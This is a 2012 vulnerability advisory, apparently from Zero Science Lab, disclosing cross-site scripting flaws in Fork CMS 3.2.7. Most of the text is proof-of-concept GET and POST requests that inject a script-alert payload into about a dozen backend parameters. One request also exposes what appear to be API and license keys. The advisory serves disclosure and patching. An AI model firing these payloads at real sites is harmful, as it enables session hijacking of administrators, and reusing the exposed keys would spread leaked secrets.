Fork CMS 3.2.7 Multiple HTML Code Injection Vulnerabilities

2012.03.06
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Fork CMS 3.2.7 Multiple HTML Code Injection Vulnerabilities Vendor: Fork CMS Product web page: http://www.fork-cms.com Affected version: 3.2.7 and 3.2.6 Summary: Fork is an open source cms that will rock your world. Desc: Fork CMS suffers from multiple XSS vulnerabilities when parsing user input to several parameters in different scripts, via POST and GET methods. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.9 MySQL 5.5.20 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5076 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5076.php Vendor: http://forkcms.lighthouseapp.com/projects/61890/tickets/277-multiple-cross-site-scripting-xss-vulnerabilities-in-fork-cms-327 26.02.2012 --- ---------------------------- Parameter: form_token Method: POST - POST /private/en/authentication/?querystring=/private/en HTTP/1.1 Content-Length: 134 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in ---------------------------- Parameter: value Method: GET - http://localhost/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script> ---------------------------- Parameter: name Method: GET - http://localhost/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script> ---------------------------- Parameter: type[] Method: GET - http://localhost/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script> ---------------------------- Parameter: module Method: GET - http://localhost/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script> ---------------------------- Parameter: application Method: GET - http://localhost/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script> ---------------------------- Parameter: language Method: GET - http://localhost/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script> ---------------------------- Parameters: position_1, position_2, position_3, position_4 Method: POST - POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1 form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D ---------------------------- Parameter: success_message Method: POST - POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1 form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en ---------------------------- Parameter: smtp_password Method: POST - POST http://localhost/private/en/settings/email HTTP/1.1 form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script> ---------------------------- Parameters: site_html_footer, site_html_header Method: POST - POST http://localhost/private/en/settings/index HTTP/1.1 form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret= ----------------------------

References:

http://www.fork-cms.com
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5076.php
http://forkcms.lighthouseapp.com/projects/61890/tickets/277-multiple-cross-site-scripting-xss-vulnerabilities-in-fork-cms-327


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top